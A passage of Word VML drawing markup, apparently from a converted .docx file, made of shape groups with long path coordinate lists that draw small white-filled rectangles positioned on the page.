,5799,6342,5798,6342,5797,6342,5796,6342,5796,6342,5795,6342,5794,6342,5792,6342,5791,6342,5790,6342,5789,6342,5788,6342,5787,6342,5786,6342,5784,6342,5783,6342,5782,6342,5780,6342,5779,6342,5778,6342,5776,6342,5775,6342,5773,6342,5772,6342,5770,6342,5768,6342,5767,6342,5765,6342,5763,6342,5761,6342,5760,6342,5758,6342,5756,6342,5754,6342,5752,6342,5750,6342,5748,6342,5746,6342,5744,6342,5741,6342,5739,6342,5737,6342,5734,6342,5732,6342,5730,6342,5727,6342,5725,6342,5722,6342,5719,6342,5717,6342,5714,6342,5711,6342,5709,6342,5706,6342,5703,6342,5700,6342,5697,6342,5697,6342,5697,6342,5697,6342,5697,6342,5697,6342,5697,6342,5697,6342,5697,6342,5697,6342,5697,6342,5697,6342,5697,6342,5697,6342,5697,6342,5697,6342,5697,6342,5697,6342,5697,6341,5697,6341,5697,6341,5697,6341,5697,6341,5697,6341,5697,6340,5697,6340,5697,6340,5697,6340,5697,6339,5697,6339,5697,6339,5697,6338,5697,6338,5697,6337,5697,6337,5697,6336,5697,6336,5697,6335,5697,6335,5697,6334,5697,6333,5697,6333,5697,6332,5697,6331,5697,6330,5697,6329,5697,6328,5697,6327,5697,6326,5697,6325,5697,6324,5697,6323,5697,6322,5697,6321,5697,6320,5697,6318,5697,6317,5697,6316,5697,6314,5697,6313,5697,6311,5697,6309,5697,6308,5697,6306,5697,6304,5697,6303,5697,6301,5697,6299,5697,6297,5697,6295,5697,6292,5697,6290,5697,6288,5697,6286,5697,6283,5697,6281,5697,6278,5697,6276,5697,6273,5697,6270,5697,6268,5697,6265,5697,6262,5697,6259,5697,6256,5697,6252,5697,6249,5697,6246,5697,6242,5697,6239,5697,6235,5697,6232,5697,6228,5697,6224,5697,6220,5697,6216,5697,6212,5697,6208,5697,6204,5697,6200,5697,6195,5697,6191,5697,6186,5697,6182,5697,6177,5697,6172,5697,6167,5697,6162,5697,6157,5697,6151,5697,6146,5697,6141,5697,6135,5697,6129,5697,6124,5697,6118,5697,6112,5697,6106,5697,6100,5697,6093,5697,6087e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:307.500pt;margin-top:303.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6150,6070" coordsize="130,270">
        <v:shape style="position:absolute;left:6150;top:6070;width:130;height:270" coordorigin="6150,6070" coordsize="130,270" path="m6177,6087l6177,6087,6177,6087,6177,6087,6177,6087,6177,6087,6177,6087,6177,6087,6177,6087,6177,6087,6177,6087,6177,6087,6177,6087,6177,6087,6177,6087,6177,6087,6177,6087,6177,6087,6177,6087,6178,6087,6178,6087,6178,6087,6178,6087,6178,6087,6178,6087,6178,6087,6178,6087,6178,6087,6179,6087,6179,6087,6179,6087,6179,6087,6179,6087,6179,6087,6180,6087,6180,6087,6180,6087,6180,6087,6181,6087,6181,6087,6181,6087,6182,6087,6182,6087,6182,6087,6183,6087,6183,6087,6184,6087,6184,6087,6185,6087,6185,6087,6185,6087,6186,6087,6187,6087,6187,6087,6188,6087,6188,6087,6189,6087,6190,6087,6190,6087,6191,6087,6192,6087,6192,6087,6193,6087,6194,6087,6195,6087,6196,6087,6197,6087,6198,6087,6199,6087,6200,6087,6201,6087,6202,6087,6203,6087,6204,6087,6205,6087,6206,6087,6207,6087,6208,6087,6210,6087,6211,6087,6212,6087,6214,6087,6215,6087,6216,6087,6218,6087,6219,6087,6221,6087,6222,6087,6224,6087,6226,6087,6227,6087,6229,6087,6231,6087,6233,6087,6234,6087,6236,6087,6238,6087,6240,6087,6242,6087,6244,6087,6246,6087,6248,6087,6251,6087,6253,6087,6255,6087,6257,6087,6260,6087,6262,6087,6264,6087,6267,6087,6269,6087,6272,6087,6275,6087,6277,6087,6280,6087,6283,6087,6285,6087,6288,6087,6291,6087,6294,6087,6297,6087,6297,6087,6297,6087,6297,6087,6297,6087,6297,6087,6297,6087,6297,6087,6297,6087,6297,6087,6297,6087,6297,6087,6297,6087,6297,6087,6297,6087,6297,6087,6297,6088,6297,6088,6297,6088,6297,6088,6297,6088,6297,6088,6297,6088,6297,6089,6297,6089,6297,6089,6297,6089,6297,6090,6297,6090,6297,6090,6297,6091,6297,6091,6297,6092,6297,6092,6297,6093,6297,6093,6297,6094,6297,6094,6297,6095,6297,6095,6297,6096,6297,6097,6297,6097,6297,6098,6297,6099,6297,6100,6297,6101,6297,6102,6297,6103,6297,6104,6297,6105,6297,6106,6297,6107,6297,6108,6297,6110,6297,6111,6297,6112,6297,6114,6297,6115,6297,6117,6297,6118,6297,6120,6297,6121,6297,6123,6297,6125,6297,6127,6297,6129,6297,6131,6297,6133,6297,6135,6297,6137,6297,6139,6297,6141,6297,6144,6297,6146,6297,6148,6297,6151,6297,6154,6297,6156,6297,6159,6297,6162,6297,6165,6297,6168,6297,6171,6297,6174,6297,6177,6297,6180,6297,6183,6297,6187,6297,6190,6297,6194,6297,6197,6297,6201,6297,6205,6297,6209,6297,6213,6297,6217,6297,6221,6297,6225,6297,6230,6297,6234,6297,6238,6297,6243,6297,6248,6297,6253,6297,6257,6297,6262,6297,6267,6297,6273,6297,6278,6297,6283,6297,6289,6297,6294,6297,6300,6297,6306,6297,6311,6297,6317,6297,6323,6297,6330,6297,6336,6297,6342,6297,6342,6297,6342,6297,6342,6297,6342,6297,6342,6297,6342,6297,6342,6297,6342,6297,6342,6297,6342,6297,6342,6297,6342,6297,6342,6297,6342,6297,6342,6297,6342,6297,6342,6297,6342,6297,6342,6297,6342,6297,6342,6297,6342,6296,6342,6296,6342,6296,6342,6296,6342,6296,6342,6296,6342,6296,6342,6295,6342,6295,6342,6295,6342,6295,6342,6295,6342,6294,6342,6294,6342,6294,6342,6294,6342,6293,6342,6293,6342,6293,6342,6292,6342,6292,6342,6292,6342,6291,6342,6291,6342,6290,6342,6290,6342,6289,6342,6289,6342,6288,6342,6288,6342,6287,6342,6287,6342,6286,6342,6285,6342,6285,6342,6284,6342,6283,6342,6283,6342,6282,6342,6281,6342,6280,6342,6279,6342,6278,6342,6278,6342,6277,6342,6276,6342,6275,6342,6274,6342,6273,6342,6272,6342,6271,6342,6269,6342,6268,6342,6267,6342,6266,6342,6265,6342,6263,6342,6262,6342,6261,6342,6259,6342,6258,6342,6256,6342,6255,6342,6253,6342,6252,6342,6250,6342,6249,6342,6247,6342,6245,6342,6243,6342,6242,6342,6240,6342,6238,6342,6236,6342,6234,6342,6232,6342,6230,6342,6228,6342,6226,6342,6224,6342,6222,6342,6219,6342,6217,6342,6215,6342,6212,6342,6210,6342,6207,6342,6205,6342,6202,6342,6200,6342,6197,6342,6194,6342,6192,6342,6189,6342,6186,6342,6183,6342,6180,6342,6177,6342,6177,6342,6177,6342,6177,6342,6177,6342,6177,6342,6177,6342,6177,6342,6177,6342,6177,6342,6177,6342,6177,6342,6177,6342,6177,6342,6177,6342,6177,6342,6177,6342,6177,6342,6177,6341,6177,6341,6177,6341,6177,6341,6177,6341,6177,6341,6177,6340,6177,6340,6177,6340,6177,6340,6177,6339,6177,6339,6177,6339,6177,6338,6177,6338,6177,6337,6177,6337,6177,6336,6177,6336,6177,6335,6177,6335,6177,6334,6177,6333,6177,6333,6177,6332,6177,6331,6177,6330,6177,6329,6177,6328,6177,6327,6177,6326,6177,6325,6177,6324,6177,6323,6177,6322,6177,6321,6177,6320,6177,6318,6177,6317,6177,6316,6177,6314,6177,6313,6177,6311,6177,6309,6177,6308,6177,6306,6177,6304,6177,6303,6177,6301,6177,6299,6177,6297,6177,6295,6177,6292,6177,6290,6177,6288,6177,6286,6177,6283,6177,6281,6177,6278,6177,6276,6177,6273,6177,6270,6177,6268,6177,6265,6177,6262,6177,6259,6177,6256,6177,6252,6177,6249,6177,6246,6177,6242,6177,6239,6177,6235,6177,6232,6177,6228,6177,6224,6177,6220,6177,6216,6177,6212,6177,6208,6177,6204,6177,6200,6177,6195,6177,6191,6177,6186,6177,6182,6177,6177,6177,6172,6177,6167,6177,6162,6177,6157,6177,6151,6177,6146,6177,6141,6177,6135,6177,6129,6177,6124,6177,6118,6177,6112,6177,6106,6177,6100,6177,6093,6177,6087e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:151.500pt;margin-top:494.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3030,9890" coordsize="250,270">
        <v:shape style="position:absolute;left:3030;top:9890;width:250;height:270" coordorigin="3030,9890" coordsize="250,270" path="m3041,9914l3041,9914,3041,9914,3041,9914,3041,9914,3041,9914,3041,9914,3041,9914,3041,9914,3041,9914,3041,9914,3041,9914,3041,9914,3041,9914,3041,9914,3041,9914,3041,9914,3041,9914,3041,9914,3041,9914,3042,9914,3042,9914,3042,9914,3042,9914,3042,9914,3043,9914,3043,9914,3043,9914,3043,9914,3044,9914,3044,9914,3044,9914,3045,9914,3045,9914,3046,9914,3046,9914,3047,9914,3047,9914,3048,9914,3048,9914,3049,9914,3050,9914,3050,9914,3051,9914,3052,9914,3053,9914,3054,9914,3054,9914,3055,9914,3056,9914,3057,9914,3058,9914,3059,9914,3061,9914,3062,9914,3063,9914,3064,9914,3066,9914,3067,9914,3068,9914,3070,9914,3071,9914,3073,9914,3074,9914,3076,9914,3078,9914,3080,9914,3081,9914,3083,9914,3085,9914,3087,9914,3089,9914,3092,9914,3094,9914,3096,9914,3098,9914,3101,9914,3103,9914,3106,9914,3108,9914,3111,9914,3113,9914,3116,9914,3119,9914,3122,9914,3125,9914,3128,9914,3131,9914,3134,9914,3138,9914,3141,9914,3144,9914,3148,9914,3151,9914,3155,9914,3159,9914,3163,9914,3167,9914,3171,9914,3175,9914,3179,9914,3183,9914,3187,9914,3192,9914,3196,9914,3201,9914,3205,9914,3210,9914,3215,9914,3220,9914,3225,9914,3230,9914,3235,9914,3241,9914,3246,9914,3252,9914,3257,9914,3263,9914,3269,9914,3275,9914,3281,9914,3281,9914,3281,9914,3281,9914,3281,9914,3281,9914,3281,9914,3281,9914,3281,9914,3281,9914,3281,9914,3281,9914,3281,9914,3281,9914,3281,9914,3281,9914,3281,9915,3281,9915,3281,9915,3281,9915,3281,9915,3281,9915,3281,9915,3281,9916,3281,9916,3281,9916,3281,9916,3281,9917,3281,9917,3281,9917,3281,9918,3281,9918,3281,9919,3281,9919,3281,9919,3281,9920,3281,9920,3281,9921,3281,9922,3281,9922,3281,9923,3281,9924,3281,9924,3281,9925,3281,9926,3281,9927,3281,9928,3281,9929,3281,9930,3281,9931,3281,9932,3281,9933,3281,9934,3281,9935,3281,9937,3281,9938,3281,9939,3281,9941,3281,9942,3281,9944,3281,9945,3281,9947,3281,9948,3281,9950,3281,9952,3281,9954,3281,9956,3281,9958,3281,9960,3281,9962,3281,9964,3281,9966,3281,9968,3281,9971,3281,9973,3281,9975,3281,9978,3281,9980,3281,9983,3281,9986,3281,9989,3281,9992,3281,9994,3281,9997,3281,10001,3281,10004,3281,10007,3281,10010,3281,10014,3281,10017,3281,10021,3281,10024,3281,10028,3281,10032,3281,10036,3281,10040,3281,10044,3281,10048,3281,10052,3281,10056,3281,10061,3281,10065,3281,10070,3281,10075,3281,10079,3281,10084,3281,10089,3281,10094,3281,10099,3281,10105,3281,10110,3281,10116,3281,10121,3281,10127,3281,10132,3281,10138,3281,10144,3281,10150,3281,10156,3281,10163,3281,10169,3281,10169,3281,10169,3281,10169,3281,10169,3281,10169,3281,10169,3281,10169,3281,10169,3281,10169,3281,10169,3281,10169,3280,10169,3280,10169,3280,10169,3280,10169,3280,10169,3280,10169,3280,10169,3280,10169,3280,10169,3280,10169,3279,10169,3279,10169,3279,10169,3279,10169,3278,10169,3278,10169,3278,10169,3278,10169,3277,10169,3277,10169,3276,10169,3276,10169,3276,10169,3275,10169,3275,10169,3274,10169,3273,10169,3273,10169,3272,10169,3272,10169,3271,10169,3270,10169,3269,10169,3269,10169,3268,10169,3267,10169,3266,10169,3265,10169,3264,10169,3263,10169,3262,10169,3261,10169,3259,10169,3258,10169,3257,10169,3256,10169,3254,10169,3253,10169,3251,10169,3250,10169,3248,10169,3247,10169,3245,10169,3243,10169,3242,10169,3240,10169,3238,10169,3236,10169,3234,10169,3232,10169,3230,10169,3227,10169,3225,10169,3223,10169,3221,10169,3218,10169,3216,10169,3213,10169,3210,10169,3208,10169,3205,10169,3202,10169,3199,10169,3196,10169,3193,10169,3190,10169,3187,10169,3184,10169,3180,10169,3177,10169,3173,10169,3170,10169,3166,10169,3162,10169,3158,10169,3155,10169,3151,10169,3147,10169,3142,10169,3138,10169,3134,10169,3129,10169,3125,10169,3120,10169,3116,10169,3111,10169,3106,10169,3101,10169,3096,10169,3091,10169,3086,10169,3080,10169,3075,10169,3070,10169,3064,10169,3058,10169,3052,10169,3047,10169,3041,10169,3041,10169,3041,10169,3041,10169,3041,10169,3041,10169,3041,10169,3041,10169,3041,10169,3041,10169,3041,10169,3041,10169,3041,10169,3041,10169,3041,10169,3041,10169,3041,10169,3041,10169,3041,10168,3041,10168,3041,10168,3041,10168,3041,10168,3041,10168,3041,10167,3041,10167,3041,10167,3041,10166,3041,10166,3041,10166,3041,10165,3041,10165,3041,10165,3041,10164,3041,10164,3041,10163,3041,10163,3041,10162,3041,10161,3041,10161,3041,10160,3041,10159,3041,10159,3041,10158,3041,10157,3041,10156,3041,10155,3041,10154,3041,10153,3041,10152,3041,10151,3041,10150,3041,10149,3041,10148,3041,10147,3041,10145,3041,10144,3041,10143,3041,10141,3041,10140,3041,10138,3041,10136,3041,10135,3041,10133,3041,10131,3041,10129,3041,10128,3041,10126,3041,10124,3041,10122,3041,10119,3041,10117,3041,10115,3041,10113,3041,10110,3041,10108,3041,10105,3041,10103,3041,10100,3041,10097,3041,10094,3041,10092,3041,10089,3041,10086,3041,10083,3041,10079,3041,10076,3041,10073,3041,10069,3041,10066,3041,10062,3041,10059,3041,10055,3041,10051,3041,10047,3041,10043,3041,10039,3041,10035,3041,10031,3041,10027,3041,10022,3041,10018,3041,10013,3041,10008,3041,10004,3041,9999,3041,9994,3041,9989,3041,9984,3041,9978,3041,9973,3041,9968,3041,9962,3041,9956,3041,9951,3041,9945,3041,9939,3041,9933,3041,9927,3041,9920,3041,9914e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:247.500pt;margin-top:494.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4950,9890" coordsize="130,270">
        <v:shape style="position:absolute;left:4950;top:9890;width:130;height:270" coordorigin="4950,9890" coordsize="130,270" path="m4961,9914l4961,9914,4961,9914,4961,9914,4962,9914,4962,9914,4962,9914,4962,9914,4962,9914,4962,9914,4962,9914,4962,9914,4962,9914,4962,9914,4962,9914,4962,9914,4962,9914,4962,9914,4962,9914,4962,9914,4962,9914,4962,9914,4962,9914,4962,9914,4962,9914,4962,9914,4963,9914,4963,9914,4963,9914,4963,9914,4963,9914,4963,9914,4964,9914,4964,9914,4964,9914,4964,9914,4965,9914,4965,9914,4965,9914,4965,9914,4966,9914,4966,9914,4966,9914,4967,9914,4967,9914,4968,9914,4968,9914,4968,9914,4969,9914,4969,9914,4970,9914,4970,9914,4971,9914,4972,9914,4972,9914,4973,9914,4973,9914,4974,9914,4975,9914,4975,9914,4976,9914,4977,9914,4978,9914,4978,9914,4979,9914,4980,9914,4981,9914,4982,9914,4983,9914,4984,9914,4985,9914,4986,9914,4987,9914,4988,9914,4989,9914,4990,9914,4992,9914,4993,9914,4994,9914,4995,9914,4997,9914,4998,9914,4999,9914,5001,9914,5002,9914,5004,9914,5005,9914,5007,9914,5008,9914,5010,9914,5012,9914,5013,9914,5015,9914,5017,9914,5019,9914,5021,9914,5023,9914,5025,9914,5027,9914,5029,9914,5031,9914,5033,9914,5035,9914,5037,9914,5039,9914,5042,9914,5044,9914,5046,9914,5049,9914,5051,9914,5054,9914,5056,9914,5059,9914,5062,9914,5064,9914,5067,9914,5070,9914,5073,9914,5076,9914,5079,9914,5082,9914,5082,9914,5082,9914,5082,9914,5082,9914,5082,9914,5082,9914,5082,9914,5082,9914,5082,9914,5082,9914,5082,9914,5082,9914,5082,9914,5082,9914,5082,9914,5082,9915,5082,9915,5082,9915,5082,9915,5082,9915,5082,9915,5082,9915,5082,9916,5082,9916,5082,9916,5082,9916,5082,9917,5082,9917,5082,9917,5082,9918,5082,9918,5082,9919,5082,9919,5082,9919,5082,9920,5082,9920,5082,9921,5082,9922,5082,9922,5082,9923,5082,9924,5082,9924,5082,9925,5082,9926,5082,9927,5082,9928,5082,9929,5082,9930,5082,9931,5082,9932,5082,9933,5082,9934,5082,9935,5082,9937,5082,9938,5082,9939,5082,9941,5082,9942,5082,9944,5082,9945,5082,9947,5082,9948,5082,9950,5082,9952,5082,9954,5082,9956,5082,9958,5082,9960,5082,9962,5082,9964,5082,9966,5082,9968,5082,9971,5082,9973,5082,9975,5082,9978,5082,9980,5082,9983,5082,9986,5082,9989,5082,9992,5082,9994,5082,9997,5082,10001,5082,10004,5082,10007,5082,10010,5082,10014,5082,10017,5082,10021,5082,10024,5082,10028,5082,10032,5082,10036,5082,10040,5082,10044,5082,10048,5082,10052,5082,10056,5082,10061,5082,10065,5082,10070,5082,10075,5082,10079,5082,10084,5082,10089,5082,10094,5082,10099,5082,10105,5082,10110,5082,10116,5082,10121,5082,10127,5082,10132,5082,10138,5082,10144,5082,10150,5082,10156,5082,10163,5082,10169,5082,10169,5082,10169,5082,10169,5082,10169,5082,10169,5082,10169,5082,10169,5082,10169,5082,10169,5082,10169,5081,10169,5081,10169,5081,10169,5081,10169,5081,10169,5081,10169,5081,10169,5081,10169,5081,10169,5081,10169,5081,10169,5081,10169,5081,10169,5081,10169,5081,10169,5080,10169,5080,10169,5080,10169,5080,10169,5080,10169,5080,10169,5079,10169,5079,10169,5079,10169,5079,10169,5079,10169,5078,10169,5078,10169,5078,10169,5077,10169,5077,10169,5077,10169,5076,10169,5076,10169,5075,10169,5075,10169,5075,10169,5074,10169,5074,10169,5073,10169,5073,10169,5072,10169,5072,10169,5071,10169,5070,10169,5070,10169,5069,10169,5068,10169,5068,10169,5067,10169,5066,10169,5065,10169,5065,10169,5064,10169,5063,10169,5062,10169,5061,10169,5060,10169,5059,10169,5058,10169,5057,10169,5056,10169,5055,10169,5054,10169,5053,10169,5052,10169,5050,10169,5049,10169,5048,10169,5046,10169,5045,10169,5044,10169,5042,10169,5041,10169,5039,10169,5038,10169,5036,10169,5035,10169,5033,10169,5031,10169,5030,10169,5028,10169,5026,10169,5024,10169,5022,10169,5020,10169,5019,10169,5017,10169,5015,10169,5012,10169,5010,10169,5008,10169,5006,10169,5004,10169,5001,10169,4999,10169,4997,10169,4994,10169,4992,10169,4989,10169,4987,10169,4984,10169,4981,10169,4979,10169,4976,10169,4973,10169,4970,10169,4967,10169,4965,10169,4961,10169,4961,10169,4961,10169,4961,10169,4961,10169,4961,10169,4961,10169,4961,10169,4961,10169,4961,10169,4961,10169,4961,10169,4961,10169,4961,10169,4961,10169,4961,10169,4961,10169,4961,10169,4961,10168,4961,10168,4961,10168,4961,10168,4961,10168,4961,10168,4961,10167,4961,10167,4961,10167,4961,10166,4961,10166,4961,10166,4961,10165,4961,10165,4961,10165,4961,10164,4961,10164,4961,10163,4961,10163,4961,10162,4961,10161,4961,10161,4961,10160,4961,10159,4961,10159,4961,10158,4961,10157,4961,10156,4961,10155,4961,10154,4961,10153,4961,10152,4961,10151,4961,10150,4961,10149,4961,10148,4961,10147,4961,10145,4961,10144,4961,10143,4961,10141,4961,10140,4961,10138,4961,10136,4961,10135,4961,10133,4961,10131,4961,10129,4961,10128,4961,10126,4961,10124,4961,10122,4961,10119,4961,10117,4961,10115,4961,10113,4961,10110,4961,10108,4961,10105,4961,10103,4961,10100,4961,10097,4961,10094,4961,10092,4961,10089,4961,10086,4961,10083,4961,10079,4961,10076,4961,10073,4961,10069,4961,10066,4961,10062,4961,10059,4961,10055,4961,10051,4961,10047,4961,10043,4961,10039,4961,10035,4961,10031,4961,10027,4961,10022,4961,10018,4961,10013,4961,10008,4961,10004,4961,9999,4961,9994,4961,9989,4961,9984,4961,9978,4961,9973,4961,9968,4961,9962,4961,9956,4961,9951,4961,9945,4961,9939,4961,9933,4961,9927,4961,9920,4961,9914e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:246.500pt;margin-top:602.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4930,12050" coordsize="130,250">
        <v:shape style="position:absolute;left:4930;top:12050;width:130;height:250" coordorigin="4930,12050" coordsize="130,250" path="m4946,12060l4946,12060,4946,12060,4946,12060,4946,12060,4946,12060,4947,12060,4947,12060,4947,12060,4947,12060,4947,12060,4947,12060,4947,12060,4947,12060,4947,12060,4947,12060,4947,12060,4947,12060,4947,12060,4947,12060,4947,12060,4947,12060,4947,12060,4947,12060,4947,12060,4947,12060,4948,12060,4948,12060,4948,12060,4948,12060,4948,12060,4948,12060,4949,12060,4949,12060,4949,12060,4949,12060,4950,12060,4950,12060,4950,12060,4950,12060,4951,12060,4951,12060,4951,12060,4952,12060,4952,12060,4953,12060,4953,12060,4953,12060,4954,12060,4954,12060,4955,12060,4955,12060,4956,12060,4957,12060,4957,12060,4958,12060,4958,12060,4959,12060,4960,12060,4960,12060,4961,12060,4962,12060,4963,12060,4963,12060,4964,12060,4965,12060,4966,12060,4967,12060,4968,12060,4969,12060,4970,12060,4971,12060,4972,12060,4973,12060,4974,12060,4975,12060,4977,12060,4978,12060,4979,12060,4980,12060,4982,12060,4983,12060,4984,12060,4986,12060,4987,12060,4989,12060,4990,12060,4992,12060,4993,12060,4995,12060,4997,12060,4998,12060,5000,12060,5002,12060,5004,12060,5006,12060,5008,12060,5010,12060,5012,12060,5014,12060,5016,12060,5018,12060,5020,12060,5022,12060,5024,12060,5027,12060,5029,12060,5031,12060,5034,12060,5036,12060,5039,12060,5041,12060,5044,12060,5047,12060,5049,12060,5052,12060,5055,12060,5058,12060,5061,12060,5064,12060,5067,12060,5067,12060,5067,12060,5067,12060,5067,12060,5067,12060,5067,12060,5067,12060,5067,12060,5067,12060,5067,12060,5067,12060,5067,12060,5067,12060,5067,12060,5067,12060,5067,12061,5067,12061,5067,12061,5067,12061,5067,12061,5067,12061,5067,12061,5067,12062,5067,12062,5067,12062,5067,12062,5067,12063,5067,12063,5067,12063,5067,12064,5067,12064,5067,12065,5067,12065,5067,12066,5067,12066,5067,12067,5067,12067,5067,12068,5067,12068,5067,12069,5067,12070,5067,12071,5067,12071,5067,12072,5067,12073,5067,12074,5067,12075,5067,12076,5067,12077,5067,12078,5067,12079,5067,12080,5067,12081,5067,12083,5067,12084,5067,12085,5067,12087,5067,12088,5067,12090,5067,12091,5067,12093,5067,12094,5067,12096,5067,12098,5067,12100,5067,12102,5067,12104,5067,12106,5067,12108,5067,12110,5067,12112,5067,12114,5067,12117,5067,12119,5067,12121,5067,12124,5067,12127,5067,12129,5067,12132,5067,12135,5067,12138,5067,12141,5067,12144,5067,12147,5067,12150,5067,12153,5067,12156,5067,12160,5067,12163,5067,12167,5067,12170,5067,12174,5067,12178,5067,12182,5067,12186,5067,12190,5067,12194,5067,12198,5067,12203,5067,12207,5067,12211,5067,12216,5067,12221,5067,12226,5067,12230,5067,12235,5067,12240,5067,12246,5067,12251,5067,12256,5067,12262,5067,12267,5067,12273,5067,12279,5067,12284,5067,12290,5067,12296,5067,12303,5067,12309,5067,12315,5067,12315,5067,12315,5067,12315,5067,12315,5067,12315,5067,12315,5067,12315,5067,12315,5067,12315,5067,12315,5066,12315,5066,12315,5066,12315,5066,12315,5066,12315,5066,12315,5066,12315,5066,12315,5066,12315,5066,12315,5066,12315,5066,12315,5066,12315,5066,12315,5066,12315,5065,12315,5065,12315,5065,12315,5065,12315,5065,12315,5065,12315,5064,12315,5064,12315,5064,12315,5064,12315,5063,12315,5063,12315,5063,12315,5063,12315,5062,12315,5062,12315,5062,12315,5061,12315,5061,12315,5060,12315,5060,12315,5060,12315,5059,12315,5059,12315,5058,12315,5058,12315,5057,12315,5057,12315,5056,12315,5055,12315,5055,12315,5054,12315,5053,12315,5053,12315,5052,12315,5051,12315,5050,12315,5050,12315,5049,12315,5048,12315,5047,12315,5046,12315,5045,12315,5044,12315,5043,12315,5042,12315,5041,12315,5040,12315,5039,12315,5038,12315,5036,12315,5035,12315,5034,12315,5033,12315,5031,12315,5030,12315,5029,12315,5027,12315,5026,12315,5024,12315,5023,12315,5021,12315,5020,12315,5018,12315,5016,12315,5015,12315,5013,12315,5011,12315,5009,12315,5007,12315,5005,12315,5004,12315,5002,12315,4999,12315,4997,12315,4995,12315,4993,12315,4991,12315,4989,12315,4986,12315,4984,12315,4982,12315,4979,12315,4977,12315,4974,12315,4972,12315,4969,12315,4966,12315,4964,12315,4961,12315,4958,12315,4955,12315,4952,12315,4949,12315,4946,12315,4946,12315,4946,12315,4946,12315,4946,12315,4946,12315,4946,12315,4946,12315,4946,12315,4946,12315,4946,12315,4946,12315,4946,12315,4946,12315,4946,12315,4946,12315,4946,12315,4946,12315,4946,12314,4946,12314,4946,12314,4946,12314,4946,12314,4946,12314,4946,12313,4946,12313,4946,12313,4946,12313,4946,12312,4946,12312,4946,12312,4946,12311,4946,12311,4946,12310,4946,12310,4946,12309,4946,12309,4946,12308,4946,12308,4946,12307,4946,12306,4946,12306,4946,12305,4946,12304,4946,12303,4946,12302,4946,12301,4946,12300,4946,12299,4946,12298,4946,12297,4946,12296,4946,12295,4946,12294,4946,12293,4946,12291,4946,12290,4946,12289,4946,12287,4946,12286,4946,12284,4946,12283,4946,12281,4946,12279,4946,12277,4946,12276,4946,12274,4946,12272,4946,12270,4946,12268,4946,12265,4946,12263,4946,12261,4946,12259,4946,12256,4946,12254,4946,12251,4946,12249,4946,12246,4946,12243,4946,12241,4946,12238,4946,12235,4946,12232,4946,12229,4946,12225,4946,12222,4946,12219,4946,12216,4946,12212,4946,12208,4946,12205,4946,12201,4946,12197,4946,12193,4946,12189,4946,12185,4946,12181,4946,12177,4946,12173,4946,12168,4946,12164,4946,12159,4946,12155,4946,12150,4946,12145,4946,12140,4946,12135,4946,12130,4946,12124,4946,12119,4946,12114,4946,12108,4946,12103,4946,12097,4946,12091,4946,12085,4946,12079,4946,12073,4946,12066,4946,12060e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:318.500pt;margin-top:602.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6370,12050" coordsize="130,250">
        <v:shape style="position:absolute;left:6370;top:12050;width:130;height:250" coordorigin="6370,12050" coordsize="130,250" path="m6387,12060l6387,12060,6387,12060,6387,12060,6387,12060,6387,12060,6387,12060,6387,12060,6387,12060,6387,12060,6387,12060,6387,12060,6387,12060,6387,12060,6387,12060,6387,12060,6387,12060,6388,12060,6388,12060,6388,12060,6388,12060,6388,12060,6388,12060,6388,12060,6388,12060,6388,12060,6388,12060,6388,12060,6389,12060,6389,12060,6389,12060,6389,12060,6389,12060,6390,12060,6390,12060,6390,12060,6390,12060,6391,12060,6391,12060,6391,12060,6391,12060,6392,12060,6392,12060,6392,12060,6393,12060,6393,12060,6394,12060,6394,12060,6395,12060,6395,12060,6396,12060,6396,12060,6397,12060,6397,12060,6398,12060,6398,12060,6399,12060,6400,12060,6400,12060,6401,12060,6402,12060,6403,12060,6403,12060,6404,12060,6405,12060,6406,12060,6407,12060,6408,12060,6409,12060,6410,12060,6411,12060,6412,12060,6413,12060,6414,12060,6415,12060,6416,12060,6417,12060,6418,12060,6420,12060,6421,12060,6422,12060,6424,12060,6425,12060,6427,12060,6428,12060,6429,12060,6431,12060,6433,12060,6434,12060,6436,12060,6437,12060,6439,12060,6441,12060,6443,12060,6445,12060,6446,12060,6448,12060,6450,12060,6452,12060,6454,12060,6456,12060,6458,12060,6461,12060,6463,12060,6465,12060,6467,12060,6470,12060,6472,12060,6474,12060,6477,12060,6479,12060,6482,12060,6485,12060,6487,12060,6490,12060,6493,12060,6496,12060,6498,12060,6501,12060,6504,12060,6507,12060,6507,12060,6507,12060,6507,12060,6507,12060,6507,12060,6507,12060,6507,12060,6507,12060,6507,12060,6507,12060,6507,12060,6507,12060,6507,12060,6507,12060,6507,12060,6507,12061,6507,12061,6507,12061,6507,12061,6507,12061,6507,12061,6507,12061,6507,12062,6507,12062,6507,12062,6507,12062,6507,12063,6507,12063,6507,12063,6507,12064,6507,12064,6507,12065,6507,12065,6507,12066,6507,12066,6507,12067,6507,12067,6507,12068,6507,12068,6507,12069,6507,12070,6507,12071,6507,12071,6507,12072,6507,12073,6507,12074,6507,12075,6507,12076,6507,12077,6507,12078,6507,12079,6507,12080,6507,12081,6507,12083,6507,12084,6507,12085,6507,12087,6507,12088,6507,12090,6507,12091,6507,12093,6507,12094,6507,12096,6507,12098,6507,12100,6507,12102,6507,12104,6507,12106,6507,12108,6507,12110,6507,12112,6507,12114,6507,12117,6507,12119,6507,12121,6507,12124,6507,12127,6507,12129,6507,12132,6507,12135,6507,12138,6507,12141,6507,12144,6507,12147,6507,